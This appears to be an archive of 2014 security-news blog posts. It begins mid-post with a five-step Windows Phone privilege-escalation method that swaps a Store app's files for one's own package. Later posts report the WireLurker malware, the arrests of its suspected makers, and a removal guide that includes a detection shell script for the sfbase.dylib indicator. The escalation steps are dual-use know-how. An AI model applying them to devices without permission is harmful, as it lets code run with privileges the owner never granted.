As a result, the third-party registry editor app will gain full access to the Info and Settings in the app itself. This is how the hack can be implemented, in a few simple steps prescribed by XDA Developers in a blog post.

  • Develop your own application package and deploy it on the target device.
  • Install any application such as “Glance Background Beta” from the Windows Phone Store.
  • Delete all folders under the targeted directory of the installed app, in this case, Glance background.
  • Now copy the contents of your own deployed package and paste it on the targeted directory. This implies replacing the “Program Files” of the installed app with your package files.
  • Finally launch the App which will run in OEM (Glance Background beta) directory using the privileges of the targeted App.

The hack is very simple and easy to implement because all it needs is an application from the Windows Phone Store. But thankfully, the hack has not yet escalated to a full interop unlock, as the applications which are allowed to be moved to the SD card have limited access.

The XDA Developers forum reported the vulnerability to Microsoft and also warned that it could give attackers higher privileges if tried using a first-party application rather than a third-party app. For now, we can only wait for a response from Microsoft to prevent it from getting more serious.

17 November 2014

Suspected WireLurker malware creators arrested in China


Beijing police have arrested three people suspected of developing the “WireLurker” malware that may have infected as many as hundreds of thousands of Apple users.

Local authorities arrested the three suspects on a tip from Chinese security company Qihoo 360 Technology, the Beijing police’s Internet security team said Friday.

The three suspects, surnamed Chen, Li and Wang, were detained Thursday and charged with creating and spreading the malware, the police said in a post on its official Sina Weibo account. The police did not publish the full names of the suspects. It's ironic that China, believed to be one of the largest state sponsors of organized cyberattacks against the Western world, moved so quickly to arrest the creators of WireLurker.

The malware appeared to victimize Chinese users only, and didn't have a widespread presence outside of the country. The suspects had conspired to create WireLurker as a way to gain illegal profits, and used a Chinese third-party application store called Maiyadi to spread the malware, the police added. The Maiyadi site has also been shut down.

WireLurker made headlines last week, after researchers at Palo Alto Networks discovered the malware and found that it could collect call logs, phone book contacts, and other personal information from Apple mobile devices.

Qihoo 360 Technology traced the malware back to Maiyadi, a Chinese site devoted to Apple news that also offers downloads of iOS apps and Mac software.

The malware spreads when users download an infected Mac application to their desktops or laptops. It then will go on and try to infect iOS devices once they’ve connected to the Mac via a USB cable.

About 467 Mac desktop applications infected with the malware were discovered at Maiyadi. WireLurker had yet to progress beyond collecting users’ data, Palo Alto Networks said last week.

Apple was quick to act, and said it had blocked the infected apps from launching on users’ systems. Apple did not specify how it stopped the apps from launching.

16 November 2014

#ClickSmart Tip!

Think your computer is immune to viruses? Think again! #ClickSmart this season to keep all your holiday cheer. 


10 November 2014

How To Find And Remove WireLurker Malware From iPhone, iPad

WireLurker is malware that is badly affecting iPhones and iPads. It has already hit many iOS and OS X devices in China. Therefore, many users across the globe are a little worried about the security of their devices.

It is known to exist as a threat in China only for now, but if you think you’re infected by WireLurker, then here’s how you can remove it before it does any damage.


If you’re jailbroken and believe that you’re affected by WireLurker, then follow the steps which are outlined below. But be warned, the steps might be a little complicated for some users, and if you feel that you don’t want to go through the tedious process, then simply do a clean restore of your iPhone, iPad or iPod touch using iTunes on the latest currently available public iOS release.

For Jailbroken Users
Step 1: Make sure you have iFile installed from Cydia, or the capability to SSH into your iOS device to access system directories.
Step 2: Navigate to /Library > /MobileSubstrate > /DynamicLibraries.
Step 3: Here, look for a file named sfbase.dylib, and if found, you know your device is infected.

However, if no such file exists, breathe a sigh of relief.

Deleting this file might seem to remove the WireLurker threat, but it is recommended that you do a complete restore of your iOS device from iTunes.
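The three steps for jailbroken users can be scripted so the check is repeatable, for example over an SSH session to the device. The script below is an added example, not part of the original guide: it looks for the sfbase.dylib indicator named above under a filesystem root (defaulting to `/`, or a copied or mounted tree passed as the first argument), and, going beyond the guide, lists every other MobileSubstrate extension in that directory so unexpected ones can be reviewed. It assumes a POSIX `sh` with `mktemp`; the demo at the end runs on a constructed temporary tree, not a real device.

```shell
#!/bin/sh
# Added example (not from the guide): automate the jailbroken-device check.
# Usage: sh wirelurker_check.sh [ROOT]   (ROOT defaults to / when run on the device)

# Indicator path named in the guide, relative to the filesystem root.
WIRELURKER_DYLIB="Library/MobileSubstrate/DynamicLibraries/sfbase.dylib"

# Returns 0 (clean) if the indicator is absent under ROOT, 1 (infected) if present.
check_wirelurker() {
  root="${1:-/}"
  target="${root%/}/$WIRELURKER_DYLIB"
  if [ -e "$target" ]; then
    echo "INFECTED: found $target"
    return 1
  fi
  echo "clean: $WIRELURKER_DYLIB not present under $root"
  return 0
}

# Beyond the guide: print every .dylib in the MobileSubstrate extension
# directory (one per line) so a responder can review anything unexpected.
# The directory only exists on jailbroken devices; prints nothing otherwise.
list_substrate_dylibs() {
  root="${1:-/}"
  dir="${root%/}/Library/MobileSubstrate/DynamicLibraries"
  [ -d "$dir" ] || return 0
  for f in "$dir"/*.dylib; do
    [ -e "$f" ] || continue   # glob matched nothing
    printf '%s\n' "$f"
  done
}

# Stand-alone demo on a constructed tree (sample data, not a real device).
demo=$(mktemp -d)
mkdir -p "$demo/Library/MobileSubstrate/DynamicLibraries"
check_wirelurker "$demo"                       # clean: indicator absent
: > "$demo/Library/MobileSubstrate/DynamicLibraries/sfbase.dylib"
check_wirelurker "$demo" || echo "-> restore the device from iTunes as the guide recommends"
list_substrate_dylibs "$demo"
rm -rf "$demo"
```

The function exits non-zero when the indicator is present, so the script can be chained into a larger triage routine; treat a hit as a reason to restore from iTunes rather than only deleting the file, as the guide says.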

For Non-Jailbroken Users
Although there’s no way you can be infected by WireLurker at this point, since Apple has put appropriate security measures in place, there’s a possibility that you contracted the malware a while back, before the Cupertino giant took action. If you believe that you’re infected and don’t happen to be jailbroken, then read on.

Step 1: Open the Settings app and go to General > Profile.
Step 2: Check for any anomalous profile listed here, and if you find one delete it.

Step 3: Check all installed apps for strange behavior, and delete all strange or suspicious ones that you find installed.

Again, it is highly recommended that you do a complete restore of your iOS device from iTunes until a more effective and surefire solution comes up.

If you found this guide helpful, then do share it with your friends, to keep them safe and secure too.

09 November 2014

The iPhone WireLurker malware - what you need to know


There’s a scary new piece of malware that collects call logs, phonebook contacts and other sensitive information from Apple iPhones and iPads. Should you be worried?

The malware was first discovered by researchers at Palo Alto Networks who dubbed it WireLurker and said it exhibited behavior that had never been seen before in malicious software targeting Apple’s platforms.

It works by infecting software downloaded from the Web into a desktop or laptop computer. Once installed, the malware waits for an iPhone or iPad to be connected via USB, then it scans the mobile device to see what software it contains. If a target app is installed, it copies the app from the mobile device to the desktop or laptop PC, infects the app and then copies it back.

Once infected, the malware appears to collect data from the user but, to date, no other malicious activity has been discovered, said Palo Alto Networks.

For hundreds of millions of Apple iOS users, malware is a scary prospect. The platform has seen so few attacks that many users don’t run antivirus software.

If you’re one of them, you probably don’t have much to worry about from WireLurker.

The primary route of initial infection has been through several hundred apps offered through a third-party Chinese software site called Maiyadi, so if you’ve kept away from that you’re almost certainly safe.

Secondly, the malware primarily targets iPhones that have been “jailbroken”—that is, had some of their security removed so certain apps can be run on them. There is a version that targets conventional iPhones and carries an Apple digital security certificate, but researchers say even that version requires that users approve it before it runs.

And finally, it targets popular Chinese apps like Taobao, Alipay or Meitu, so if you’re not running those, you have another layer of protection.

Palo Alto Networks estimates several hundred thousand iPhone and iPad users have nonetheless been infected.

For the rest, Apple has blocked affected apps so that should halt infection this time.

The limited nature of the security problem might turn out to be a blessing in disguise. Engineers at computer security companies and Apple will be able to analyze the way WireLurker works and prevent similar malware from spreading the same way in the future.

07 November 2014

Chinese iOS devices fall prey to invasive WireLurker malware


Researchers at Palo Alto Networks said they’ve discovered an impressive malware attack against Apple devices, which for now appears to be limited to users of a Chinese application store.

The campaign revolves around infecting Mac OS X applications with “WireLurker,” which collects call logs, phone book contacts and other sensitive information on Apple mobile devices.

Some 467 Mac OS X applications offered on a Chinese third-party application store called Maiyadi were found to have been seeded with WireLurker, including “The Sims 3,” “International Snooker 2012” and “Pro Evolution Soccer 2014,” according to Palo Alto’s research paper.

Over the last six months, those applications and others have been downloaded 356,104 times “and may have impacted hundreds of thousands of users,” the paper said.

Apple advises that users stick to downloading applications from its App Store, which it closely vets, and stay away from third-party stores for security reasons.

It would appear some people turn to the Maiyadi store because it offers applications for free, said Ryan Olson, intelligence director for Palo Alto Networks’ Unit 42, the company’s threat intelligence branch.

Palo Alto analyzed three versions of WireLurker, each of which was an improvement on the previous one, Olson said in a phone interview Wednesday. But it doesn’t appear the WireLurker attack progressed beyond collecting data from mobile devices.

“We think we sort of caught someone developing the attack, and they haven’t gotten to the point of launching the full attack,” Olson said. “From our perspective, it still looks like an information gathering operation.”

The WireLurker attack is notable for how it leverages desktop Mac applications as part of the attack on iOS. If someone downloaded a Mac OS X desktop application from Maiyadi, WireLurker came along with it.

WireLurker then waits for when an iOS device is connected by a USB cable. A second version of WireLurker checks if the Apple device was “jailbroken,” the term for removing restrictions that Apple uses to prevent users from running applications it has not approved.

Then it would look to see if applications such as Taobao, Alipay or Meitu, a photo editing application, were installed, Olson said. If so, it would copy the application to the desktop Mac, infect it with WireLurker and copy it back to the device.

The third iteration of WireLurker targets iOS devices that are not jailbroken as well. In that version, WireLurker used a digital certificate that Apple issues to enterprise developers so they can run their own applications in-house that do not appear on the App Store.

Using the digital certificate means iOS would allow a third-party application to be installed, although it would display a warning to users, Olson said. If a user approves the installation, WireLurker could be installed along with a legitimate application.

Olson said Palo Alto Networks has been in contact with Apple in the last few days, which is now aware of WireLurker.

“There’s no vulnerability here for them to patch, but they certainly want to be aware of malware and how it works,” Olson said.

Apple could first revoke the enterprise digital certificate that WireLurker’s creators are using, Olson said. The company could also issue an update to detect WireLurker in XProtect, Apple’s antivirus engine, he said.